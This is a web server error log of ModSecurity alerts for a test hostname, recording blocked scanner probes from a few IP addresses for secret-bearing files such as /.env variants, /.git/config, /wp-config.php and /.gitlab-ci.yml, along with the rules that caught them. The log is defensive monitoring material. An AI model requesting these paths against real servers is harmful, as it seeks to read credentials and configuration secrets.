[Tue Nov 18 07:10:39.951446 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRwN3xHo1z0h3O4bzTlo3QAAAAQ"]
[Tue Nov 18 07:10:40.150073 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRwN4BHo1z0h3O4bzTlo3gAAAAQ"]
[Tue Nov 18 07:10:40.153304 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRwN4BHo1z0h3O4bzTlo3gAAAAQ"]
[Tue Nov 18 07:10:40.153528 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRwN4BHo1z0h3O4bzTlo3gAAAAQ"]
[Tue Nov 18 07:10:40.380379 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRwN4BHo1z0h3O4bzTlo3wAAAAQ"]
[Tue Nov 18 07:10:40.380779 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRwN4BHo1z0h3O4bzTlo3wAAAAQ"]
[Tue Nov 18 07:10:40.383752 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRwN4BHo1z0h3O4bzTlo3wAAAAQ"]
[Tue Nov 18 07:10:40.383917 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRwN4BHo1z0h3O4bzTlo3wAAAAQ"]
[Tue Nov 18 07:10:40.583093 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRwN4BHo1z0h3O4bzTlo4AAAAAQ"]
[Tue Nov 18 07:10:40.586073 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRwN4BHo1z0h3O4bzTlo4AAAAAQ"]
[Tue Nov 18 07:10:40.586284 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRwN4BHo1z0h3O4bzTlo4AAAAAQ"]
[Tue Nov 18 07:10:40.966856 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRwN4BHo1z0h3O4bzTlo4QAAAAQ"]
[Tue Nov 18 07:10:40.969833 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRwN4BHo1z0h3O4bzTlo4QAAAAQ"]
[Tue Nov 18 07:10:40.970008 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRwN4BHo1z0h3O4bzTlo4QAAAAQ"]
[Tue Nov 18 07:10:41.334116 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aRwN4RHo1z0h3O4bzTlo4gAAAAQ"]
[Tue Nov 18 07:10:41.337160 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aRwN4RHo1z0h3O4bzTlo4gAAAAQ"]
[Tue Nov 18 07:10:41.337358 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aRwN4RHo1z0h3O4bzTlo4gAAAAQ"]
[Tue Nov 18 13:00:45.951650 2025] [:error] [pid 163656] [client 195.178.110.223:54074] [client 195.178.110.223] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRxf7cCoCYNOyUBImXwJIgAAAAc"]
[Tue Nov 18 13:00:45.951947 2025] [:error] [pid 163656] [client 195.178.110.223:54074] [client 195.178.110.223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRxf7cCoCYNOyUBImXwJIgAAAAc"]
[Tue Nov 18 13:00:45.952114 2025] [:error] [pid 163656] [client 195.178.110.223:54074] [client 195.178.110.223] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRxf7cCoCYNOyUBImXwJIgAAAAc"]
[Tue Nov 18 14:51:02.720301 2025] [:error] [pid 162466] [client 34.235.129.146:54382] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aRx5xqJlEnz6fqogZZMKdAAAAAE"]
[Tue Nov 18 14:51:02.720532 2025] [:error] [pid 162466] [client 34.235.129.146:54382] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aRx5xqJlEnz6fqogZZMKdAAAAAE"]
[Tue Nov 18 14:51:02.720704 2025] [:error] [pid 162466] [client 34.235.129.146:54382] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aRx5xqJlEnz6fqogZZMKdAAAAAE"]
[Tue Nov 18 14:51:02.742165 2025] [:error] [pid 154301] [client 34.235.129.146:54356] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRx5xu18X441rUDF_U5eRQAAAAg"]
[Tue Nov 18 14:51:02.742528 2025] [:error] [pid 154301] [client 34.235.129.146:54356] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRx5xu18X441rUDF_U5eRQAAAAg"]
[Tue Nov 18 14:51:02.742807 2025] [:error] [pid 154301] [client 34.235.129.146:54356] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRx5xu18X441rUDF_U5eRQAAAAg"]
[Tue Nov 18 14:51:02.748971 2025] [:error] [pid 160239] [client 34.235.129.146:54362] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aRx5xu1NcONF8naoxQFe9AAAAAw"]
[Tue Nov 18 14:51:02.749163 2025] [:error] [pid 160239] [client 34.235.129.146:54362] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aRx5xu1NcONF8naoxQFe9AAAAAw"]
[Tue Nov 18 14:51:02.749319 2025] [:error] [pid 160239] [client 34.235.129.146:54362] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aRx5xu1NcONF8naoxQFe9AAAAAw"]
[Tue Nov 18 14:51:02.763030 2025] [:error] [pid 163656] [client 34.235.129.146:54390] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aRx5xsCoCYNOyUBImXwJKgAAAAc"]
[Tue Nov 18 14:51:02.763225 2025] [:error] [pid 163656] [client 34.235.129.146:54390] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aRx5xsCoCYNOyUBImXwJKgAAAAc"]
[Tue Nov 18 14:51:02.763382 2025] [:error] [pid 163656] [client 34.235.129.146:54390] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aRx5xsCoCYNOyUBImXwJKgAAAAc"]
[Tue Nov 18 14:51:02.766712 2025] [:error] [pid 160906] [client 34.235.129.146:54376] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aRx5xv7FUeIdxVPAs5iguAAAAAY"]
[Tue Nov 18 14:51:02.766893 2025] [:error] [pid 160906] [client 34.235.129.146:54376] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aRx5xv7FUeIdxVPAs5iguAAAAAY"]
[Tue Nov 18 14:51:02.767045 2025] [:error] [pid 160906] [client 34.235.129.146:54376] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aRx5xv7FUeIdxVPAs5iguAAAAAY"]
[Tue Nov 18 14:51:02.778517 2025] [:error] [pid 160237] [client 34.235.129.146:54342] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aRx5xk0XkfZCrdQo7dFhVwAAAAM"]
[Tue Nov 18 14:51:02.778666 2025] [:error] [pid 160237] [client 34.235.129.146:54342] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aRx5xk0XkfZCrdQo7dFhVwAAAAM"]
[Tue Nov 18 14:51:02.778811 2025] [:error] [pid 160237] [client 34.235.129.146:54342] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aRx5xk0XkfZCrdQo7dFhVwAAAAM"]
[Tue Nov 18 14:51:02.784722 2025] [:error] [pid 160901] [client 34.235.129.146:54336] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aRx5xh54imVYfbO8_klVUgAAAAU"]
